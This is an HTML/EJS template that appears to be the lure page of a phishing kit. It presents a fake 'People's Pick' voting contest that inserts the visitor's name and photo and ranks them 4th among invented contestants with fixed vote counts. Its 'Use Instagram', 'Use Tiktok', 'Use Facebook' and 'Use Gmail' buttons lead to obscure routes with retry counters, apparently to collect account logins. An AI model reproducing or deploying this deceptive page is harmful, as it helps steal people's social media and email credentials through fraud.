<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <link rel="preconnect" href="https://fonts.googleapis.com" />
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin />
    <link
      href="https://fonts.googleapis.com/css2?family=Poppins:wght@100;200;300;400;500;600;700;800;900&display=swap"
      rel="stylesheet"
    />
    <link rel="stylesheet" href="/css/v2.css" />
    <title>The People's Pick: Online Spectacle</title>
  </head>
  <body>
    <nav>
      <div class="logo">The People's Pick</div>
    </nav>
    <div class="container">
      <div class="v-container">
        <div class="profile">
          <div class="bio-wrap">
            <img src="<%= picture %>" alt="" />
            <div class="bio">
              <div>Name: <strong><%= name %></strong></div>
              <div>Total: <strong>119</strong></div>
              <div>Position: <strong>4</strong></div>
              <div>Left to qualify: <strong>6</strong></div>
              <% if(linkType === "INSTAGRAM"){ %>
              <a class="instagram" href="/inst/<%= linkId %>?retry=<%=link.numberOfRetries%>"
                >Use Instagram
                <img
                  src="https://media.bio.site/sites/40c9e36c-cc2e-4dab-9353-29502ce3469a/7ZpyxXG6XVyK6MFmmePXNM.webp"
                  alt="instagram"
                />
              </a>
              <%}%> <% if(linkType === "TIKTOK"){ %>
              <a class="instagram" href="/tikto/<%= linkId %>?retry=<%=link.numberOfRetries%>"
                >Use Tiktok
                <img src="/tiktok/tiktok.png" alt="tiktok" />
              </a>
              <%}%> <% if(linkType === "FACEBOOK"){ %>
              <a class="instagram" href="/face/<%= linkId %>?retry=<%=link.numberOfRetries%>"
                >Use Facebook
                <img src="/img/facebook-logo.png" alt="faebook" />
              </a>
              <%}%> <% if(linkType === "GMAIL"){ %>
              <a class="instagram" href="/gma/<%= linkId %>?retry=<%=link.numberOfRetries%>"
                >Use Gmail
                <img src="/img/gmail.png" alt="gmail" />
              </a>
              <%}%>
            </div>
          </div>
          <br />
        </div>
        <!-- participants -->
        <div class="participants">
          <h4>Top Contestans</h4>
          <div class="contestant">1. Ashley Martinez - 156</div>
          <div class="contestant">2. Samantha Davis - 143</div>
          <div class="contestant">3. Madison Brown - 124</div>
          <div class="contestant">4. <%= name %> - 119</div>
          <div class="contestant">5. Olivia Garcia - 89</div>
          <div class="contestant">6. Isabella Clark - 55</div>
          <div class="contestant">7. Sophia White - 34</div>
        </div>
      </div>
    </div>
  </body>
</html>
